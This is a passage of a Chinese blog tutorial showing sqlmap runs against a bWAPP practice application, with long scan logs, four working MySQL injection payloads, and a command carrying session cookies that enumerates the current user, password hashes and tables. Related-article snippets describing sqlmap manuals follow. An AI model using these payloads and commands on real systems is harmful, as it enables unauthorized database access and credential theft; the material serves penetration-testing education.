[18:15:20] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[18:15:26] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[18:15:31] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:15:43] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[18:15:46] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[18:15:50] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[18:15:50] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[18:15:50] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[18:15:50] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[18:15:50] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[18:15:50] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[18:15:50] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[18:15:50] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[18:15:50] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[18:15:51] [INFO] testing 'MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)'
[18:15:51] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[18:15:51] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[18:15:51] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[18:15:52] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[18:15:52] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[18:15:52] [INFO] testing 'MySQL inline queries'
[18:15:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[18:15:55] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[18:15:59] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[18:16:01] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[18:16:06] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[18:16:08] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[18:16:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:16:18] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[18:16:24] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[18:16:30] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[18:16:35] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[18:16:39] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[18:16:42] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[18:16:46] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[18:16:49] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[18:16:55] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[18:17:01] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK)'
[18:17:06] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query)'
[18:17:11] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK - comment)'
[18:17:15] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query - comment)'
[18:17:18] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)'
[18:17:25] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query - comment)'
[18:17:29] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[18:17:34] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[18:17:38] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[18:17:43] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[18:17:46] [INFO] testing 'MySQL AND time-based blind (ELT)'
[18:17:52] [INFO] testing 'MySQL OR time-based blind (ELT)'
[18:17:57] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[18:18:01] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[18:18:04] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[18:18:08] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[18:18:10] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[18:18:10] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[18:18:11] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (BENCHMARK)'
[18:18:11] [INFO] testing 'MySQL > 5.0.12 time-based blind - Parameter replace (heavy query - comment)'
[18:18:16] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[18:18:16] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[18:18:16] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[18:18:16] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[18:18:16] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (BENCHMARK)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[18:20:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:20:25] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[18:20:25] [WARNING] most likely web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for a few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
[18:20:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:21:10] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[18:21:49] [WARNING] GET parameter 'action' does not seem to be injectable
sqlmap identified the following injection point(s) with a total of 3926 HTTP(s) requests:
---
Parameter: title (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: title=Iron Man' OR NOT 5557=5557#&action=search
​
    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: title=Iron Man' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7170707871,(SELECT (ELT(9118=9118,1))),0x71787a6b71,0x78))s), 8446744073709551610, 8446744073709551610)))-- DJGx&action=search
​
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: title=Iron Man' AND (SELECT 8291 FROM (SELECT(SLEEP(5)))gNKi)-- NqMd&action=search
​
    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: title=Iron Man' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170707871,0x6a47494c595a48466c44707668676a466a624c61785854647069434e446946536d55717850476941,0x71787a6b71),NULL#&action=search
[18:21:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
[18:21:49] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\8.142.109.131'
​
[*] ending @ 18:21:49 /2022-06-16/

sqlmap使用案例三

说明:

1、扫描bWAPP - Login注入点,并附带cookie,指定数据库类型为mysql,检索DBMS当前用户,检索DBMS当前数据库,枚举DBMS用户密码散列,枚举DBMS数据库表

2、如果之前已经对这个注入点扫描过sqlmap会记住并在下一次扫描时自动读入结果并完成注入请求,这样就减少扫描过程

$ sqlmap -u"http://8.142.109.131:8080/sqli_1.php?title=Iron+Man&action=search" -D "mysql" –-cookie="security=low;grafana_session=d98406ee1386e4964189e699f4ab95aa;PHPSESSID=u4bj5utd41l2t7rlgkdje96mf0;security_level=0" --passwords -v 0 --current-user --current-db --tables

 扫描分析过程输出:

$ sqlmap -u"http://8.142.109.131:8080/sqli_1.php?title=Iron+Man&action=search" -D "mysql" –-cookie="security=low;grafana_session=d98406ee1386e4964189e699f4ab95aa;PHPSESSID=u4bj5utd41l2t7rlgkdje96mf0;security_level=0" --passwords -v 0 --current-user --current-db --tables
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.6.6#pip}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:23:08 /2022-06-17/

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: title (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: title=Iron Man' OR NOT 5557=5557#&action=search

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: title=Iron Man' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7170707871,(SELECT (ELT(9118=9118,1))),0x71787a6b71,0x78))s), 8446744073709551610, 8446744073709551610)))-- DJGx&action=search

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: title=Iron Man' AND (SELECT 8291 FROM (SELECT(SLEEP(5)))gNKi)-- NqMd&action=search

    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: title=Iron Man' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170707871,0x6a47494c595a48466c44707668676a466a624c61785854647069434e446946536d55717850476941,0x71787a6b71),NULL#&action=search
---
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.5
current user: 'root@localhost'
current database: 'bWAPP'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y
database management system users password hashes:
[*] admin [1]:
    password hash: NULL
[*] root [1]:
    password hash: NULL

Database: mysql
[24 tables]
+---------------------------+
| user                      |
| columns_priv              |
| db                        |
| event                     |
| func                      |
| general_log               |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| ndb_binlog_index          |
| plugin                    |
| proc                      |
| procs_priv                |
| proxies_priv              |
| servers                   |
| slow_log                  |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
+---------------------------+

[*] ending @ 12:24:05 /2022-06-17/

 欢迎大家关注我的订阅号,会定期分享一些关于测试相关的文章,有问题也欢迎一起讨论学习!
在这里插入图片描述 

 

小黑测试员
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
sqlmap代码
qq_46648283的博客
05-20 6292
Microsoft Windows [版本 10.0.19044.1706] (c) Microsoft Corporation。保留所有权利。 D:\sqlmap>sqlmap.py -u http://localhost/pikachu/vul/sqli/sqli_str.php?name=Tony&submit=%E6%9F%A5%E8%AF%A2 --current -db ___ __H__ ___ ___[)]_____ ___ ___ {1..
sqlmap用户手册
11-30
当给sqlmap这么一个url的时候,它会: 1、判断可注入的参数 2、判断可以用那种SQL注入技术来注入 3、识别出哪种数据库 4、根据用户选择,读取哪些数据
Sqlmap手册—史上最全
最新发布
2301_80127209的博客
05-09 1016
申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。渗透工具技术文档、书籍 面试题帮助你在面试中脱颖而出视频基础到进阶环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等 应急响应笔记学习路线
sqlmap手册
weixin_34146986的博客
03-09 97
https://www.cnblogs.com/MiWhite/p/6906140.html 转载于:https://blog.51cto.com/haidragon/2360603
Sqlmap中文手册
mark's technic world
07-11 449
https://blog.csdn.net/wn314/article/details/78872828
sqlmap使用手册
浅笑996的博客
11-10 284
0x01. Sqlmap支持的数据库 SQLMap支持的数据库:       MySQL Oracle PostgreSQL Microsoft SQL Server Microsoft Access ...
sqlmap使用手册
硫酸超的博客
12-08 3317
sqlmap采用五种独特的SQL注入技术 1)基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2)基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3)基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4)联合查询注入,可以使用union的情况下的注入。 5)堆查询注入,可以同时执行多条语句的执行时的注入。 sqlmap的使用方式 sqlmap的使用方式: sqlmap [options]; 帮助选
Sqlmap使用手册中文版
01-13
用户手册详尽地介绍了Sqlmap的所有选项和开关,提供了丰富的实例,帮助用户理解和掌握如何有效使用这个工具。 当进行Web应用审计时,如果发现页面中的参数(如GET、POST或Cookie)可能受到用户输入的影响,Sqlmap...
sqlmap使用手册集合
06-10
本手册集合将全面介绍SQLMap的使用方法和技巧。 一、SQLMap基本概念 SQL注入是一种常见的网络安全威胁,攻击者通过输入恶意的SQL代码,控制或获取数据库中的敏感信息。SQLMap通过自动识别和利用这些注入漏洞,可以...
sqlmap中文手册.pdf
08-13
sqlmap中文版的使用,仅供学习研究使用.用户手册 介绍——介绍 sqlmap 技术——sqlmap 支持的 SQL 注入技术 特性——支持的特性列表 下载更新——更新你的 sqlmap 副本 相关依赖——关于第三方库和工具的信息 历史...
sqlmap手册-中文版.pdf
07-30
sqlmap
sqlmap中文使用手册
06-16
sqlmap的中文使用手册,非常实用,对常用的sqlmap命令参数、作用进行了一一介绍。
SQLmap使用手册1
08-03
SQLmap 是一个自动化的SQL注入工具,主要用于检测和利用网站应用程序中的SQL注入漏洞。它能够帮助安全研究人员或渗透测试人员有效地发现和利用这些漏洞,从而评估网站的安全性。以下是关于SQLmap的详细信息: **...
SQLmap 使用手册
执着
09-08 1407
Sqlmap 是由 Python 写成的,开源的自动化 SQL 注入工具和这一功能允许执行任意的 SQL 语句,Sqlmap 会自动解析给出的 SQL 语句,选择恰当的注入技术并将给出的 SQL 语句打包到 payload 中。如果查询是个 SELECT 语句,Sqlmap 会返回查询结果。如果 Web 应用使用的数据库管理系统支持多语句查询,Sqlmap 会使用堆注入技术。
sqlmap使用手册(详细)
闵行小鱼塘
06-02 2026
sqlmap的用法整理,也作为自己的使用参考手册
sqlmap用户手册中文版
weixin_42121782的博客
04-04 421
无意在网上看到sqlmap的中文手册,想查一些不常用的命令啥的都可以查,用法也描述详细易懂 留着自己看 https://octobug.gitbooks.io/sqlmap-wiki-zhcn/content/Users-manual/Introduction.html ...
Sqlmap手册—史上最全!最详细手册!
2301_77147728的博客
03-27 682
开源的SQL注入漏洞检测的工具,能够检测动态页面中的get/post参数,cookie,http头,还能够查看数据,文件系统访问,甚至能够操作系统命令执行。检测方式:布尔盲注、时间盲注、报错注入、UNION联合查询注入、堆叠注入支持数据库:Mysql、Oracle、PostgreSQL、MSSQL、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDb。
pdf:sqlmap使用手册
07-04
### 回答1: SQLMap是一款开源的自动化测试工具,用于测试和利用Web应用程序中可能存在的SQL注入漏洞。本文主要介绍了SQLMap使用手册。 首先,安装SQLMap。我们可以从官方网站下载最新版本的SQLMap,并将其解压到我们希望存放的位置。然后,我们需要确保我们的系统上已经安装了Python,以便能够运行SQLMap。 接下来,我们需要了解SQLMap的基本命令和选项。SQLMap支持多种命令和选项,可以根据我们的需要进行配置。我们可以使用“-h”选项来查看SQLMap的帮助信息,了解每个选项的作用和用法。 在使用SQLMap之前,我们需要先进行目标选择。我们可以使用“-u”选项指定目标URL,并选择相应的数据库和表进行测试。我们还可以使用其他选项,如“-r”用于指定请求文件,或者“-g”用于指定Google搜索语句。 然后,我们可以使用“-p”选项指定要测试的参数,并使用“-D”和“-T”选项指定要测试的数据库和表。然后,我们可以使用其他选项,如“--columns”用于获取表的列名,或者“--dump”用于获取表的数据。 在进行SQL注入测试时,我们需要注意保护隐私和遵守法律。我们应该获得合法授权,并只在授权范围内进行测试。我们还应该注意测试中可能引发的安全问题,并及时向相关人员报告。 总的来说,SQLMap是一款功能强大的自动化测试工具,可以帮助我们快速发现和利用Web应用程序中可能存在的SQL注入漏洞。使用SQLMap时,我们需要了解其基本命令和选项,并确保遵守相关法律和规定。希望本文的使用手册能帮助大家更好地使用SQLMap。 ### 回答2: sqlmap是一款流行的用于检测和利用SQL注入漏洞的开源工具。它可以用来自动化地发现和利用Web应用程序中的SQL注入漏洞。在这个PDF文档中,我将向您介绍如何使用sqlmap来进行SQL注入攻击测试。 首先,我们需要确保已经安装了sqlmap。您可以从官方网站上下载最新版本的sqlmap,并根据安装说明进行安装。 在文档中,您将会学到如何使用sqlmap进行基本的SQL注入测试。首先,您需要获得一个目标网站的URL,并确认它存在SQL注入漏洞的迹象。接下来,您将使用sqlmap的命令行参数来指定目标URL和其他必要的选项。然后,sqlmap将会自动对目标网站进行扫描,并报告任何发现的SQL注入漏洞。 一旦sqlmap发现了SQL注入漏洞,您可以使用它来获取数据库的信息,执行任意SQL语句,甚至获取敏感信息。在使用sqlmap进行攻击之前,请确保您已经获得了合法的授权,并且尊重法律和道德规范。 该PDF文档还包括了有关sqlmap的高级用法和技巧的介绍。您将学习如何使用代理服务器来隐藏自己的身份,如何使用多线程和延迟来优化扫描速度,以及如何绕过常见的WAF(Web应用防火墙)和IDS(入侵检测系统)等等。 总的来说,这个PDF文档将为您提供一个全面的sqlmap使用指南。通过学习这个手册,您将能够使用sqlmap快速、准确地发现和利用Web应用程序中的SQL注入漏洞。希望这个文档对您有所帮助,祝您使用sqlmap进行安全测试工作顺利。 ### 回答3: sqlmap是一款用于自动化SQL注入的工具,可以帮助渗透测试人员评估和保护Web应用程序的安全性。它具有强大的功能和易于使用的界面,能够自动发现和利用Web应用程序中的SQL注入漏洞。 pdf:sqlmap使用手册是针对sqlmap工具的一份详细说明书,提供了关于sqlmap使用的详细指南和示例。它包含了sqlmap的安装、配置和使用方法,以及各种高级功能和选项的说明。 使用pdf:sqlmap使用手册可以帮助用户快速掌握sqlmap的基本操作和功能。手册中包括了从简单的注入检测到复杂的注入利用的步骤,以及如何配置和调整sqlmap的选项以满足不同的需求。 手册中还介绍了sqlmap的一些高级功能,如指纹识别、提权、文件读取和写入等。这些功能可以帮助用户更加深入地评估Web应用程序的安全性,发现更多的漏洞。 总之,pdf:sqlmap使用手册是一份非常有价值的资料,它提供了sqlmap工具的详尽说明和示例,帮助用户更好地了解和使用sqlmap。无论是初学者还是有经验的渗透测试人员,都可以通过该手册提高他们的技能和知识,有效地评估和保护Web应用程序的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值